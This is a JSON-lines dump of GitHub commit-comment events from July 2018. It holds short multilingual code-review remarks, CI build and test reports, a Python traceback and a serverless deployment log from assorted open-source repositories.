{"id":"7969069273","type":"CommitCommentEvent","actor":{"login":"endreman0"},"repo":{"name":"tweirtx/debatebot"},"payload":{"comment":{"id":29716471,"position":null,"line":null,"path":null,"commit_id":"0cc0b90955cf144a50c6b1d36a8cc2319a72d25d","created_at":"2018-07-16T07:37:30Z","updated_at":"2018-07-16T07:37:30Z","author_association":"NONE","body":"Happy to help! :smiley: "}},"created_at":"2018-07-16T07:37:30Z"}
{"id":"7969069358","type":"CommitCommentEvent","actor":{"login":"FirstYy"},"repo":{"name":"FirstYy/jenkins"},"payload":{"comment":{"id":29716472,"position":3,"line":25,"path":"src/main/java/com/itmayiedu/contoller/HelloConttoller.java","commit_id":"51cf416d771bb5e487992f4d41c00f7580dbabda","created_at":"2018-07-16T07:37:32Z","updated_at":"2018-07-16T07:37:32Z","author_association":"OWNER","body":"test"}},"created_at":"2018-07-16T07:37:32Z"}
{"id":"7969072648","type":"CommitCommentEvent","actor":{"login":"burlakilia"},"repo":{"name":"js-tasks-ru/js-20180517_svetlana1"},"payload":{"comment":{"id":29716478,"position":40,"line":69,"path":"11-module/1-task/index.js","commit_id":"1b05a178cc935b919251d5766a4f5d124d9136f9","created_at":"2018-07-16T07:38:26Z","updated_at":"2018-07-16T07:38:26Z","author_association":"CONTRIBUTOR","body":"{} - обязательны\r\n"}},"created_at":"2018-07-16T07:38:26Z"}
{"id":"7969076439","type":"CommitCommentEvent","actor":{"login":"burlakilia"},"repo":{"name":"js-tasks-ru/js-20180517_svetlana1"},"payload":{"comment":{"id":29716482,"position":29,"line":58,"path":"11-module/1-task/index.js","commit_id":"1b05a178cc935b919251d5766a4f5d124d9136f9","created_at":"2018-07-16T07:39:27Z","updated_at":"2018-07-16T07:39:27Z","author_association":"CONTRIBUTOR","body":"такое лучше убрать в фукнцию, и не писать коммент \r\ncheckSpaceBelow() < document.documentElement.clientHeight"}},"created_at":"2018-07-16T07:39:27Z"}
{"id":"7969080752","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29716487,"position":null,"line":null,"path":null,"commit_id":"ef865eebc8f4094a5ffc57a1965660d585ecc9cf","created_at":"2018-07-16T07:40:35Z","updated_at":"2018-07-16T07:40:35Z","author_association":"NONE","body":"eigen_HBIRE (mbadams5) - i386-Windows-7-VisualStudio-14: OK (2932 of 2945 tests passed, 0 test warnings)\n\n\n\nFailures:\n\n\nEnergyPlusFixture Test Summary\n * Passed: 651\n * Failed: 4\n\nintegration Test Summary\n * Passed: 616\n * Failed: 9\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ef865eebc8f4094a5ffc57a1965660d585ecc9cf-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ef865eebc8f4094a5ffc57a1965660d585ecc9cf-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.56%25-yellow.png)</a> \n"}},"created_at":"2018-07-16T07:40:35Z"}
{"id":"7969082249","type":"CommitCommentEvent","actor":{"login":"arn354"},"repo":{"name":"openatv/MetrixHD"},"payload":{"comment":{"id":29716491,"position":null,"line":null,"path":null,"commit_id":"3622c4bd70ce39dfa959635f45bb7ddf7bcb8285","created_at":"2018-07-16T07:40:58Z","updated_at":"2018-07-16T07:40:58Z","author_association":"MEMBER","body":"had to revert, not able to fix right now\r\n\r\n```\r\n08:46:18.6104 { D } Traceback (most recent call last):\r\n08:46:18.6104 { D }   File \"/usr/lib/enigma2/python/Navigation.py\", **** 237, in dispatchEvent\r\n08:46:18.6106 { D }   File \"/usr/lib/enigma2/python/Components/PerServiceDisplay.py\", **** 17, in event\r\n08:46:18.6109 { D }   File \"/usr/lib/enigma2/python/Components/Sources/CurrentService.py\", **** 26, in serviceEvent\r\n08:46:18.6111 { D }   File \"/usr/lib/enigma2/python/Components/Element.py\", **** 86, in changed\r\n08:46:18.6112 { D }   File \"/usr/lib/enigma2/python/Tools/CList.py\", **** 7, in __call__\r\n08:46:18.6113 { D }   File \"/usr/lib/enigma2/python/Components/Converter/ServiceName.py\", **** 128, in changed\r\n08:46:18.6114 { D }   File \"/usr/lib/enigma2/python/Components/Element.py\", **** 86, in changed\r\n08:46:18.6115 { D }   File \"/usr/lib/enigma2/python/Tools/CList.py\", **** 7, in __call__\r\n08:46:18.6116 { D }   File \"/home/oe1/atv62/build-enviroment/builds/openatv/release/gb7252/tmp/work/cortexa15hf-neon-vfpv4-oe-linux-gnueabi/enigma2-plugin-skins-metrix-atv/2.1+gitAUTOINC+3622c4bd70-r7/git/usr/lib/enigma2/python/Components/Renderer/MetrixHDXPicon.py\", **** 80, in changed\r\n08:46:18.6118 { D }   File \"/usr/lib/enigma2/python/Components/config.py\", **** 1846, in __getattr__\r\n08:46:18.6121 { D } KeyError: 'MyMetrixLiteOther'\r\n08:46:18.6121 [ E ] python/python.cpp:209 call [ePyObject] (PyObject_CallObject(<bound method Navigation.dispatchEvent of <Navigation.Navigation instance at 0xb1793530>>,(0,)) failed)\r\n```"}},"created_at":"2018-07-16T07:40:58Z"}
{"id":"7969085841","type":"CommitCommentEvent","actor":{"login":"JamesDelfini"},"repo":{"name":"JamesDelfini/Laravel-Mastery"},"payload":{"comment":{"id":29716499,"position":null,"line":null,"path":null,"commit_id":"8c575be16c1006332e3d82537600512c473699e8","created_at":"2018-07-16T07:41:57Z","updated_at":"2018-07-16T07:41:57Z","author_association":"OWNER","body":"php artisan cache:clear\r\nphp artisan config:cache\r\ncomposer dump-autoload\r\n\r\nRun this command if logging in is still not working after configuration of \".env\" file."}},"created_at":"2018-07-16T07:41:57Z"}
{"id":"7969086473","type":"CommitCommentEvent","actor":{"login":"VinhVo90"},"repo":{"name":"neverdie999/CLT_GRAPH"},"payload":{"comment":{"id":29716501,"position":4,"line":9,"path":"README.md","commit_id":"2c7cdf433d82bba9877c225e8d230223d4c5c576","created_at":"2018-07-16T07:42:07Z","updated_at":"2018-07-16T07:42:07Z","author_association":"NONE","body":"##test"}},"created_at":"2018-07-16T07:42:07Z"}
{"id":"7969086555","type":"CommitCommentEvent","actor":{"login":"Luis-Cervantes"},"repo":{"name":"sharplispers/cormanlisp"},"payload":{"comment":{"id":29716502,"position":null,"line":null,"path":null,"commit_id":"fc494431ad61d987ab902a92614ca05bc4524a77","created_at":"2018-07-16T07:42:08Z","updated_at":"2018-07-16T07:42:08Z","author_association":"COLLABORATOR","body":"Update structures.lisp for Issue-33 and other fixes\r\nCode for duplicating structure-objects no longer needed in light of new Class redefinition capabilities"}},"created_at":"2018-07-16T07:42:08Z"}
{"id":"7969093786","type":"CommitCommentEvent","actor":{"login":"Munna-k"},"repo":{"name":"Munna-k/second"},"payload":{"comment":{"id":29716512,"position":null,"line":null,"path":null,"commit_id":"7a7158a6481d7ede0babd7511636130295d6b71d","created_at":"2018-07-16T07:43:58Z","updated_at":"2018-07-16T07:43:58Z","author_association":"OWNER","body":"fdvgfd"}},"created_at":"2018-07-16T07:43:58Z"}
{"id":"7969103217","type":"CommitCommentEvent","actor":{"login":"goto-bus-stop"},"repo":{"name":"transloadit/uppy"},"payload":{"comment":{"id":29716524,"position":null,"line":null,"path":null,"commit_id":"06b8c5f7662ce56ab0f53421b4b97c92072ea1c3","created_at":"2018-07-16T07:46:21Z","updated_at":"2018-07-16T07:46:21Z","author_association":"MEMBER","body":"Allowedfiletypes should be string[] but rest is good 👌"}},"created_at":"2018-07-16T07:46:21Z"}
{"id":"7969108545","type":"CommitCommentEvent","actor":{"login":"Subinsmani"},"repo":{"name":"Bootleggers-Future/nice_vendor_bootleggers"},"payload":{"comment":{"id":29716537,"position":5,"line":20,"path":"build/tasks/bacon.mk","commit_id":"933ee62fa2cff2ed276ed6164d2410aa7bc7d1af","created_at":"2018-07-16T07:47:45Z","updated_at":"2018-07-16T07:47:45Z","author_association":"NONE","body":"It should be vendor/bootleggers/build/core/colors.mk,,,\r\n:)"}},"created_at":"2018-07-16T07:47:45Z"}
{"id":"7969113282","type":"CommitCommentEvent","actor":{"login":"dpaluy"},"repo":{"name":"NataliaPavliy/CryptoAddressValidator"},"payload":{"comment":{"id":29716544,"position":14,"line":14,"path":".travis.yml","commit_id":"d65a8e611675bc8ebbe638bf9f87fff0db0a6ef9","created_at":"2018-07-16T07:49:01Z","updated_at":"2018-07-16T07:49:01Z","author_association":"NONE","body":"@NataliaPavliy WTF?"}},"created_at":"2018-07-16T07:49:01Z"}
{"id":"7969113590","type":"CommitCommentEvent","actor":{"login":"AbhishekTripathi1289"},"repo":{"name":"WiserUFBA/ArduMideaWrapper"},"payload":{"comment":{"id":29716545,"position":null,"line":null,"path":null,"commit_id":"ed0ef5370e0926d263676be17d4115795b687e34","created_at":"2018-07-16T07:49:06Z","updated_at":"2018-07-16T07:49:06Z","author_association":"NONE","body":"hi\r\ni am creating a app of carrier media AC, so can you tell me the working of device (ESP8266) used in Carrier Media Ac and please tell commands understand by this device."}},"created_at":"2018-07-16T07:49:06Z"}
{"id":"7969114349","type":"CommitCommentEvent","actor":{"login":"dpaluy"},"repo":{"name":"NataliaPavliy/CryptoAddressValidator"},"payload":{"comment":{"id":29716546,"position":3,"line":3,"path":"LICENSE","commit_id":"d65a8e611675bc8ebbe638bf9f87fff0db0a6ef9","created_at":"2018-07-16T07:49:17Z","updated_at":"2018-07-16T07:49:17Z","author_association":"NONE","body":"@NataliaPavliy WTF?"}},"created_at":"2018-07-16T07:49:17Z"}
{"id":"7969117908","type":"CommitCommentEvent","actor":{"login":"kxm806857264"},"repo":{"name":"lanQiaoZhuJiaoTuan/testGithub"},"payload":{"comment":{"id":29716554,"position":null,"line":null,"path":null,"commit_id":"b337d2fb4f02edd7fd6eb216f84fc680fa118f48","created_at":"2018-07-16T07:50:14Z","updated_at":"2018-07-16T07:50:14Z","author_association":"CONTRIBUTOR","body":"还原"}},"created_at":"2018-07-16T07:50:14Z"}
{"id":"7969126242","type":"CommitCommentEvent","actor":{"login":"bpoplauschi"},"repo":{"name":"rs/SDWebImage"},"payload":{"comment":{"id":29716574,"position":null,"line":null,"path":null,"commit_id":"d2dc4cbbac3b141f9f74cadab293696593dfa680","created_at":"2018-07-16T07:52:20Z","updated_at":"2018-07-16T07:52:20Z","author_association":"COLLABORATOR","body":"`NSFileManager` was not thread safe at that time"}},"created_at":"2018-07-16T07:52:20Z"}
{"id":"7969134113","type":"CommitCommentEvent","actor":{"login":"gkorland"},"repo":{"name":"RedisLabsModules/RediSearch"},"payload":{"comment":{"id":29716587,"position":690,"line":29,"path":"LICENSE","commit_id":"c516603c0705ccd14efc1623c4702cba63b8d262","created_at":"2018-07-16T07:54:26Z","updated_at":"2018-07-16T07:54:26Z","author_association":"CONTRIBUTOR","body":"Thanks!"}},"created_at":"2018-07-16T07:54:26Z"}
{"id":"7969136585","type":"CommitCommentEvent","actor":{"login":"irwir"},"repo":{"name":"miniupnp/miniupnp"},"payload":{"comment":{"id":29716591,"position":4,"line":542,"path":"miniupnpc/minissdpc.c","commit_id":"c55d27f46ef9649feada028583c4d3354e7909f0","created_at":"2018-07-16T07:55:05Z","updated_at":"2018-07-16T07:55:05Z","author_association":"CONTRIBUTOR","body":"The correct conditions should be [(see MS Docs)](https://docs.microsoft.com/en-us/windows/desktop/winprog/using-the-windows-headers)\r\n`#if _WIN32_WINNT >= _WIN32_WINNT_VISTA`"}},"created_at":"2018-07-16T07:55:05Z"}
{"id":"7969140529","type":"CommitCommentEvent","actor":{"login":"nirvn"},"repo":{"name":"qgis/QGIS"},"payload":{"comment":{"id":29716596,"position":115,"line":164,"path":"src/ui/raster/qgshillshaderendererwidget.ui","commit_id":"0ac35a6747c110fd2ac88cc7b1eb8d92e7c8ab4f","created_at":"2018-07-16T07:56:03Z","updated_at":"2018-07-16T07:56:03Z","author_association":"CONTRIBUTOR","body":"@nyalldawson , @elpaso , I was re-thinking this, is it better to say \"make sure project's CRS matches that of the raster\", or \"make sure the raster's CRS matches that of the project\"? :)"}},"created_at":"2018-07-16T07:56:03Z"}
{"id":"7969140605","type":"CommitCommentEvent","actor":{"login":"miyconst"},"repo":{"name":"Starcounter/ResourceBooking"},"payload":{"comment":{"id":29716598,"position":5,"line":50,"path":"src/ResourceBooking/ResourceBooking.csproj","commit_id":"c33ebb142544c25f4ad598345a4c270db1f779c5","created_at":"2018-07-16T07:56:04Z","updated_at":"2018-07-16T07:56:04Z","author_association":"MEMBER","body":"@malx122 did you commit this local path on purpose? If so, what is the intention?"}},"created_at":"2018-07-16T07:56:04Z"}
{"id":"7969142041","type":"CommitCommentEvent","actor":{"login":"moigagoo"},"repo":{"name":"pragmagic/karax"},"payload":{"comment":{"id":29716599,"position":6,"line":24,"path":"karax/karaxdsl.nim","commit_id":"015590e8060402f9f31a16f6de1d6371f64c3317","created_at":"2018-07-16T07:56:27Z","updated_at":"2018-07-16T07:56:27Z","author_association":"NONE","body":"Thank you for the clarification and your patience :-)"}},"created_at":"2018-07-16T07:56:27Z"}
{"id":"7969142147","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29716600,"position":null,"line":null,"path":null,"commit_id":"ef865eebc8f4094a5ffc57a1965660d585ecc9cf","created_at":"2018-07-16T07:56:28Z","updated_at":"2018-07-16T07:56:28Z","author_association":"NONE","body":"eigen_HBIRE (mbadams5) - x86_64-MacOS-10.9-clang: Tests Failed (2405 of 2945 tests passed, 54 test warnings)\n\nMessages:\n\n * 567 tests had: EIO diffs.\n * 71 tests had: ESO small diffs.\n * 35 tests had: Table small diffs.\n * 18 tests had: MTR small diffs.\n * 500 tests had: ESO big diffs.\n * 403 tests had: MTR big diffs.\n * 8 tests had: AUD diffs.\n * 504 tests had: Table big diffs.\n * 245 tests had: SSZ big diffs.\n * 300 tests had: ZSZ big diffs.\n * 63 tests had: ERR diffs.\n * 1 test had: SSZ small diffs.\n * 1 test had: ZSZ small diffs.\n\nFailures:\n\n\nEnergyPlusFixture Test Summary\n * Passed: 653\n * Failed: 1\n * SEGFAULT: 1\n\nintegration Test Summary\n * Passed: 616\n * Failed: 9\n\nregression Test Summary\n * Passed: 94\n * Failed: 529\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ef865eebc8f4094a5ffc57a1965660d585ecc9cf-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ef865eebc8f4094a5ffc57a1965660d585ecc9cf-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-81.66%25-red.png)</a> \n"}},"created_at":"2018-07-16T07:56:28Z"}
{"id":"7969146931","type":"CommitCommentEvent","actor":{"login":"polarbearlee"},"repo":{"name":"polarbearlee/univer--report"},"payload":{"comment":{"id":29716607,"position":null,"line":null,"path":null,"commit_id":"243c5f051ee5b4cf3a756b8c4ab982349ee5cee6","created_at":"2018-07-16T07:57:39Z","updated_at":"2018-07-16T07:57:39Z","author_association":"OWNER","body":"한글 다 깨지네..."}},"created_at":"2018-07-16T07:57:39Z"}
{"id":"7969147188","type":"CommitCommentEvent","actor":{"login":"qcam"},"repo":{"name":"ElixirVietnam/mock-interview-questions"},"payload":{"comment":{"id":29716608,"position":null,"line":null,"path":null,"commit_id":"a1f970f499299e7153ffecfaa6f550a736ddaf1f","created_at":"2018-07-16T07:57:43Z","updated_at":"2018-07-16T07:57:43Z","author_association":"COLLABORATOR","body":"thanks e! 👍 "}},"created_at":"2018-07-16T07:57:43Z"}
{"id":"7969149258","type":"CommitCommentEvent","actor":{"login":"dpr0"},"repo":{"name":"NarielKatarios/qna"},"payload":{"comment":{"id":29716614,"position":15,"line":44,"path":"spec/controllers/answers_controller_spec.rb","commit_id":"ef2776c1395fd3ebe4276f5094ec495d8bed826e","created_at":"2018-07-16T07:58:14Z","updated_at":"2018-07-16T07:58:14Z","author_association":"NONE","body":"комент убрать"}},"created_at":"2018-07-16T07:58:14Z"}
{"id":"7969151383","type":"CommitCommentEvent","actor":{"login":"dpr0"},"repo":{"name":"NarielKatarios/qna"},"payload":{"comment":{"id":29716620,"position":null,"line":null,"path":null,"commit_id":"ef2776c1395fd3ebe4276f5094ec495d8bed826e","created_at":"2018-07-16T07:58:45Z","updated_at":"2018-07-16T07:58:45Z","author_association":"NONE","body":"отлично! мерджи все и делай новую ветку из мастера для следующего задания!"}},"created_at":"2018-07-16T07:58:45Z"}
{"id":"7969152993","type":"CommitCommentEvent","actor":{"login":"Edza"},"repo":{"name":"Edza/Intertyper"},"payload":{"comment":{"id":29716623,"position":null,"line":null,"path":null,"commit_id":"16f48b57ca2d63e4f430b44e9cc57087670bbdd3","created_at":"2018-07-16T07:59:11Z","updated_at":"2018-07-16T07:59:11Z","author_association":"OWNER","body":"Not happy with this commit. Very far from pull request. I'm very confused about mocha/chai/jest and all these libraries, jasmine."}},"created_at":"2018-07-16T07:59:11Z"}
{"id":"7969154458","type":"CommitCommentEvent","actor":{"login":"touden"},"repo":{"name":"Takenori-Kusaka/takenori-kusaka.github.io"},"payload":{"comment":{"id":29716627,"position":null,"line":null,"path":null,"commit_id":"af6a577c98ef0dace528ab1ac46c811503087bac","created_at":"2018-07-16T07:59:34Z","updated_at":"2018-07-16T07:59:34Z","author_association":"COLLABORATOR","body":"mp3長いのに更新"}},"created_at":"2018-07-16T07:59:34Z"}
{"id":"7969159566","type":"CommitCommentEvent","actor":{"login":"chihaoyo"},"repo":{"name":"watchout-tw/watchout-common-functions"},"payload":{"comment":{"id":29716644,"position":null,"line":null,"path":null,"commit_id":"5524554054fd9841862b458a9ab2b903b1d808db","created_at":"2018-07-16T08:00:48Z","updated_at":"2018-07-16T08:00:48Z","author_association":"CONTRIBUTOR","body":"@wesley100002001 這樣會不會有問題？"}},"created_at":"2018-07-16T08:00:48Z"}
{"id":"7969160401","type":"CommitCommentEvent","actor":{"login":"hwwjason"},"repo":{"name":"hwwjason/hwwssm"},"payload":{"comment":{"id":29716647,"position":null,"line":null,"path":null,"commit_id":"7fb75733ec5e4b349d92205b8ba5e1216dba4ca3","created_at":"2018-07-16T08:01:00Z","updated_at":"2018-07-16T08:01:00Z","author_association":"OWNER","body":"spring、spingMVC、mybatis 框架搭建，哈哈哈哈"}},"created_at":"2018-07-16T08:01:00Z"}
{"id":"7969163529","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimEssentials"},"payload":{"comment":{"id":29716777,"position":null,"line":null,"path":null,"commit_id":"30ffb687edf63a987074f98f46c98065da8626ef","created_at":"2018-07-16T08:01:44Z","updated_at":"2018-07-16T08:01:44Z","author_association":"NONE","body":"TeamCity Xbim :: Xbim Essentials :: XbimEssentials [Build 151](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1925&buildTypeId=XbimEssentials_XbimEssentials) is now running\n"}},"created_at":"2018-07-16T08:01:44Z"}
{"id":"7969165201","type":"CommitCommentEvent","actor":{"login":"ojw28"},"repo":{"name":"google/ExoPlayer"},"payload":{"comment":{"id":29716807,"position":null,"line":null,"path":null,"commit_id":"18d208ab937e274da4974fad7b8601d35179e486","created_at":"2018-07-16T08:02:09Z","updated_at":"2018-07-16T08:02:09Z","author_association":"CONTRIBUTOR","body":"I don't think you should ever need to bind to a `DownloadService`, and it's not designed to handle that. Whatever you're trying to do, it should be possible to do it without binding (e.g. by extending, which you need to do anyway to get a concrete `DownloadService` instance). If it's really not possible to do any other way, please file a feature request explaining your use case."}},"created_at":"2018-07-16T08:02:09Z"}
{"id":"7969166152","type":"CommitCommentEvent","actor":{"login":"VittorioTrifari"},"repo":{"name":"Aircraft-Design-UniNa/jpad"},"payload":{"comment":{"id":29716808,"position":null,"line":null,"path":null,"commit_id":"17f3b86f05e14446e3b9fe324364dc21ea1b976d","created_at":"2018-07-16T08:02:21Z","updated_at":"2018-07-16T08:02:21Z","author_association":"CONTRIBUTOR","body":"The graphic bug has been fixed.\n\nIl giorno dom 15 lug 2018 alle ore 11:22 Vittorio Trifari <\nvittoriotrifari90@gmail.com> ha scritto:\n\n> I will check. But the graphic part has not been fixed yet.\n> Thank you.\n>\n> Il 14/Lug/2018 23:44, \"Agostino De Marco\" <notifications@github.com> ha\n> scritto:\n>\n>> @VittorioTrifari <https://github.com/VittorioTrifari> There's a bug in\n>> aircraft top view. VTail root profile is incorrect, t.e. seems taken from\n>> HTail root profile.\n>>\n>> —\n>> You are receiving this because you were mentioned.\n>> Reply to this email directly, view it on GitHub\n>> <https://github.com/Aircraft-Design-UniNa/jpad/commit/17f3b86f05e14446e3b9fe324364dc21ea1b976d#commitcomment-29710623>,\n>> or mute the thread\n>> <https://github.com/notifications/unsubscribe-auth/AP9dn8vOQgiNkPCUyZAafGXYBjVM9TEVks5uGmYjgaJpZM4VQBQ1>\n>> .\n>>\n>\n"}},"created_at":"2018-07-16T08:02:21Z"}
{"id":"7969166607","type":"CommitCommentEvent","actor":{"login":"paparoup"},"repo":{"name":"spacewalkproject/spacewalk"},"payload":{"comment":{"id":29716811,"position":null,"line":null,"path":null,"commit_id":"ca2c784eaff062b36f5f464affc50c2a2d21fa6a","created_at":"2018-07-16T08:02:28Z","updated_at":"2018-07-16T08:02:28Z","author_association":"NONE","body":"Hi everyone, can you please extend it again?\r\nI don't know how to proceed with \"Your satellite certificate has expired\" error\r\nThanks in advance"}},"created_at":"2018-07-16T08:02:28Z"}
{"id":"7969169223","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimEssentials"},"payload":{"comment":{"id":29716815,"position":null,"line":null,"path":null,"commit_id":"30ffb687edf63a987074f98f46c98065da8626ef","created_at":"2018-07-16T08:03:08Z","updated_at":"2018-07-16T08:03:08Z","author_association":"NONE","body":"TeamCity Xbim :: Xbim Essentials :: XbimEssentials [Build 151](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1925&buildTypeId=XbimEssentials_XbimEssentials) outcome was **FAILURE**\nSummary: Exit code 1 (new) Build time: 00:01:21"}},"created_at":"2018-07-16T08:03:08Z"}
{"id":"7969170021","type":"CommitCommentEvent","actor":{"login":"YTangIT"},"repo":{"name":"YTangIT/YTangIT.github.io"},"payload":{"comment":{"id":29716816,"position":5,"line":51,"path":"HUAWEI.html","commit_id":"4759f4c78d45cd153aebbb8ff8d893338437950c","created_at":"2018-07-16T08:03:21Z","updated_at":"2018-07-16T08:03:21Z","author_association":"OWNER","body":"测试"}},"created_at":"2018-07-16T08:03:21Z"}
{"id":"7969185327","type":"CommitCommentEvent","actor":{"login":"Alej0hio"},"repo":{"name":"OpenShopChannel/ShopChannel"},"payload":{"comment":{"id":29716843,"position":null,"line":null,"path":null,"commit_id":"f4fd0272eaafabd706b2b9b96897493397d5a831","created_at":"2018-07-16T08:07:18Z","updated_at":"2018-07-16T08:07:18Z","author_association":"NONE","body":"cool"}},"created_at":"2018-07-16T08:07:18Z"}
{"id":"7969186193","type":"CommitCommentEvent","actor":{"login":"agushermansyah621"},"repo":{"name":"Nadyatjia/Chuckyfix"},"payload":{"comment":{"id":29716845,"position":null,"line":null,"path":null,"commit_id":"3d2e2a948cf57f9a15b088712097288f747d0a58","created_at":"2018-07-16T08:07:30Z","updated_at":"2018-07-16T08:07:30Z","author_association":"NONE","body":"Putra.py"}},"created_at":"2018-07-16T08:07:30Z"}
{"id":"7969187006","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29716847,"position":null,"line":null,"path":null,"commit_id":"cb518f6c517d6cb8b8f8a6e1b3b80f4e963fc0b0","created_at":"2018-07-16T08:07:43Z","updated_at":"2018-07-16T08:07:43Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-16T08:07:43Z"}
{"id":"7969187186","type":"CommitCommentEvent","actor":{"login":"rasmusolle"},"repo":{"name":"OpenShopChannel/ShopChannel"},"payload":{"comment":{"id":29716850,"position":null,"line":null,"path":null,"commit_id":"f4fd0272eaafabd706b2b9b96897493397d5a831","created_at":"2018-07-16T08:07:47Z","updated_at":"2018-07-16T08:07:47Z","author_association":"NONE","body":"no"}},"created_at":"2018-07-16T08:07:47Z"}
{"id":"7969187683","type":"CommitCommentEvent","actor":{"login":"agushermansyah621"},"repo":{"name":"Nadyatjia/Chuckyfix"},"payload":{"comment":{"id":29716851,"position":null,"line":null,"path":null,"commit_id":"3d2e2a948cf57f9a15b088712097288f747d0a58","created_at":"2018-07-16T08:07:55Z","updated_at":"2018-07-16T08:07:55Z","author_association":"NONE","body":"3d2e2a9"}},"created_at":"2018-07-16T08:07:55Z"}
{"id":"7969189493","type":"CommitCommentEvent","actor":{"login":"caution3"},"repo":{"name":"OpenShopChannel/ShopChannel"},"payload":{"comment":{"id":29716854,"position":null,"line":null,"path":null,"commit_id":"f4fd0272eaafabd706b2b9b96897493397d5a831","created_at":"2018-07-16T08:08:22Z","updated_at":"2018-07-16T08:08:22Z","author_association":"MEMBER","body":"Drama is the last thing we want on these threads, thanks."}},"created_at":"2018-07-16T08:08:22Z"}
{"id":"7969182769","type":"CommitCommentEvent","actor":{"login":"ezenko"},"repo":{"name":"colours/nhtv"},"payload":{"comment":{"id":29716840,"position":null,"line":null,"path":null,"commit_id":"5081c8ea21d7f92b18f3f33996add5700031a3a3","created_at":"2018-07-16T08:06:36Z","updated_at":"2018-07-16T08:06:36Z","author_association":"NONE","body":"Created multidev environment [nhtv#ci-280](https://dashboard.pantheon.io/sites/a5faca03-4b4c-4936-95b8-6410ab7b2c55#ci-280).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-280-nhtv.pantheonsite.io/)"}},"created_at":"2018-07-16T08:06:36Z"}
{"id":"7969190834","type":"CommitCommentEvent","actor":{"login":"Alej0hio"},"repo":{"name":"OpenShopChannel/ShopChannel"},"payload":{"comment":{"id":29716855,"position":null,"line":null,"path":null,"commit_id":"f4fd0272eaafabd706b2b9b96897493397d5a831","created_at":"2018-07-16T08:08:43Z","updated_at":"2018-07-16T08:08:43Z","author_association":"NONE","body":"who are you angery"}},"created_at":"2018-07-16T08:08:43Z"}
{"id":"7969192594","type":"CommitCommentEvent","actor":{"login":"gtm-agent"},"repo":{"name":"zotoio/serverless-central"},"payload":{"comment":{"id":29716863,"position":null,"line":null,"path":null,"commit_id":"20e1a44a8b27ce55f1c2ca9bc46eb6304a410dba","created_at":"2018-07-16T08:09:10Z","updated_at":"2018-07-16T08:09:10Z","author_association":"NONE","body":"### Results for event id: a8228fb1-44b5-4ed9-8e2c-c5d127f25220\n<details><summary>DockerServerless : Deploy to Lambda (eea752) Execution completed.</summary>\n<p>\n\n**output tail (284 lines total):**\n\n```\n...\nregion: ap-southeast-2\nstack: sample-http-dev\napi keys:\n  None\nendpoints:\n  GET - https://yeajzvl29j.execute-api.ap-southeast-2.amazonaws.com/dev/sample-http\nfunctions:\n  sample-http: sample-http-dev-sample-http\n\nStack Outputs\nSampleDashhttpLambdaFunctionArn: arn:aws:lambda:ap-southeast-2:347186442473:function:sample-http-dev-sample-http\nApiGatewayRestApiRootResource: q643s5bj1a\nApiGatewayRestApi: yeajzvl29j\nServiceEndpoint: https://yeajzvl29j.execute-api.ap-southeast-2.amazonaws.com/dev\nServerlessDeploymentBucketName: io.zoto.serverless.dev\nServerlessAliasReference: REFERENCE\n\nServerless: Removing old service artifacts from S3...\nDone in 85.47s.\nApiGateway Endpoints:\n  GET - https://yeajzvl29j.execute-api.ap-southeast-2.amazonaws.com/master/sample-http\nSuccess:  sample-http\nALL DEPLOYS SUCCESSFUL\n>>> packaging deployment output: a8228fb1-44b5-4ed9-8e2c-c5d127f25220-output.tar.gz from output dir..\n>>> uploading output to s3://gtmstorage4/output/a8228fb1-44b5-4ed9-8e2c-c5d127f25220-output.tar.gz\n{\n    \"ETag\": \"\\\"6d349c8a8087390a5b35ef707ae37b85\\\"\"\n}\nExecution time was 169 seconds.\n\n```\n\n\nhttps://github.com/apocas/dockerode</p></details>"}},"created_at":"2018-07-16T08:09:10Z"}
{"id":"7969192725","type":"CommitCommentEvent","actor":{"login":"rasmusolle"},"repo":{"name":"OpenShopChannel/ShopChannel"},"payload":{"comment":{"id":29716864,"position":null,"line":null,"path":null,"commit_id":"f4fd0272eaafabd706b2b9b96897493397d5a831","created_at":"2018-07-16T08:09:12Z","updated_at":"2018-07-16T08:09:12Z","author_association":"NONE","body":"you’re welcome."}},"created_at":"2018-07-16T08:09:12Z"}
